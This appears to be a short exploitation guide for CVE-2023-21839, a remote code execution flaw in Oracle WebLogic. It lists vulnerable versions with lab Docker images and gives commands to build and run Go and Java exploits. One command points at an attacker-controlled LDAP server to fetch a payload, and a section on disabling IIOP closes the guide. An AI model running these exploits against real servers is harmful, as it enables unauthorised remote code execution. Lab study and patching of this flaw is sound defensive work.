WebLogic — CVE-2023-21839
Overview
CVE-2023-21839 is a critical remote code execution vulnerability affecting Oracle WebLogic through both T3 and IIOP protocols. The vulnerability impacts multiple versions including 14.1.1.0, 12.2.1.4, 12.2.1.3, and 10.3.6.0.
Vulnerable Versions
| Version | Docker Image | Status |
|---|---|---|
| 14.1.1.0 | container-registry.oracle.com/middleware/weblogic:14.1.1.0 | Vulnerable |
| 12.2.1.4 | container-registry.oracle.com/middleware/weblogic:12.2.1.4 | Vulnerable |
| 12.2.1.3 | vulhub/weblogic:12.2.1.3-2018 | Vulnerable |
IIOP Exploitation (Golang)
IIOP implements the GIOP protocol, enabling CORBA object communication. The Golang approach requires no Java dependencies and constructs the protocol directly via socket communication.
Key advantages:
- Resolves NAT network issues affecting Docker and public targets
- Cross-platform compatibility (Windows, macOS, Linux)
- Compatible with WebLogic 12/14
Build and execution:
git clone https://github.com/0xPThree/WebLogic
cd WebLogic/cve-2023-21839/cmd
go build -o CVE-2023-21839
./CVE-2023-21839 [target] [payload]T3 Exploitation (Java)
The T3 protocol transports RMI information between WebLogic servers and Java programs. This approach requires building a JAR with the wlfullclient.jar base library.
Exploitation steps:
- Generate base JAR using WebLogic's jarbuilder
- Compile exploit source code against the JAR
- Execute the packaged exploit pointing to an LDAP/RMI server
java -jar CVE_2023_21839.jar [target:port] [ldap://attacker:port/payload]Note: Java version 8u191 or earlier is required for payload construction.
Mitigation
Disable IIOP through the WebLogic Console:
Navigate to Servers > Control > AdminServer > Protocols > IIOP and uncheck "Enable IIOP". After disabling IIOP, restart the WebLogic Server using:
./stopWebLogic.sh
./startWebLogic.shOnce patched, exploit attempts will fail with a message indicating that "the incoming protocol iiop is not enabled on channel Default."